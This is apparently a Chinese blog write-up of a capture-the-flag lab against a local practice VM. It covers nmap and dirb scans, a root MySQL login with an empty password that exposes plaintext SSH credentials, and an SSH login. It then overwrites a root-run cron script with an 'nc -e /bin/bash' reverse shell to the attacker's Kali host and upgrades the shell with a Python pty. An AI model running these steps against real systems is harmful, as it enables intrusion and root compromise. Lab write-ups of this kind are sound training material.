标签:print 访问 inf png 技术 tomat mys strong --
(Size: 618 MB)
nmap -sP 192.168.91.1/24
Kali:192.168.91.128
靶机:192.168.91.129
nmap -sV -p- 192.168.91.129
开启了22端口(ssh),80端口(http),3306端口(mysql)
访问80端口服务
尝试扫描一波目录
dirb http://192.168.91.129
发现了一个info.php
文件,好像没啥用
转而看看mysql
和ssh
有没有值得利用的漏洞,然后发现mysql
可root登录,密码为空
mysql -u root -h 192.168.91.129 -p
然后发现ssh的数据库,的用户名和密码直接明文存储
show databases;
use ssh;
show tables;
select * from users;
得到用户名和密码为:mistic/testP@$$swordmistic
登录ssh
ssh mistic@192.168.91.129
在mistic
用户目录下发现logrot.sh
文件
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"
while : ; do
read line
while [[ -f $SEMAPHORE ]]; do
sleep 1s
done
printf "%s\n" "$line" >> $LOGFILE
done
而且在crontab
以root权限执行该文件
使用nc反弹shell
echo nc -e /bin/bash 192.168.91.128 1234 > logrot.sh
在kali上监听1234端口
nc -lvp 1234
使用python增加交互
python -c ‘import pty; pty.spawn("/bin/bash")‘
get flag:
标签:print 访问 inf png 技术 tomat mys strong --
原文地址:https://www.cnblogs.com/CH42e/p/13287811.html